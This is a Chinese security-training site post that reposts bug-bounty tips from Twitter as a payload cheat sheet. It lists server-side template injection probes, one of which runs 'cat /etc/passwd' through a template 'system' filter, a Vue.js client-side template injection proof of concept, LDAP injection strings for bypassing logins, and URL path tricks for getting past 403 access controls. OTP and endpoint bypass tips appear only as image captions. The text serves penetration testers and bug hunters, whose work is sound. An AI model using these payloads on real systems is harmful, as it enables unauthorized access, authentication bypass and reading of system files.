网盾网络安全培训
网盾网络安全培训
投稿

Twitter渗透技巧搬运工

访客 376 0
本文来源:

SSTI payloads

{2*2}[[7*7]]{{7*7}}{{7*'7'}}<%= 7 * 7 %>{{ request }}{{self}}{{dump(app)}}#{3*3}#{ 3 * 3 }{{ ''.__class__.__mro__[2].__subclasses__() }}{{['cat%20/etc/passwd']|filter('system')}}

原文地址:https://twitter.com/_bughunter/status/1522619419024887809?s=20&t=zoXT_4ZQw1vSYFjj1Lg_vA

Vue.js Javascript 库客户端模板注入

[PoC]

hxxp://host/?name={{this.constructor.constructor('alert("foo")')()}}

Twitter渗透技巧搬运工-第1张图片-网盾网络安全培训

原文地址:https://twitter.com/wugeej/status/1354312840681668610?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

bypass OTP二次验证技巧

Twitter渗透技巧搬运工-第2张图片-网盾网络安全培训

原文地址:https://twitter.com/nxtexploit/status/1524601440635060225?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

bypassing endpoints

Twitter渗透技巧搬运工-第3张图片-网盾网络安全培训

原文地址:https://twitter.com/beginnbounty/status/1520420265087610880?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

LDAP injection auth bypasses:)

1. *2. *)(&3. *)(|(&4. pwd)5. *)(|(*6. *))%007. admin)(&)

原文地址:https://twitter.com/ManasH4rsh/status/1520653543119593472?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

403 Forbidden bypass

GET /admin ==> 403 ForbiddenGET /blablabal/%2e%2e/admin ==> 200 OKGET /blablabal/..;/admin ==> 200 OK GET /blablabal/;/admin ==> 200 OKGET /blablabal/admin/..;/ ==> 200 OKGET /admin?access=1 ==> 200 OK

原文地址:https://twitter.com/_bughunter/status/1525874647652237312?s=20&t=3pL0jy_ZrHfU_Wl055b7vg

标签: https twitter admin

版权声明:除非特别标注,否则均为本站原创文章,转载时请以链接形式注明文章出处。

上一篇一种基于Graph Kernel的API使用示例选择方法

下一篇链家IT管理员删除数据库,被判7年有期徒刑

相关文章

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~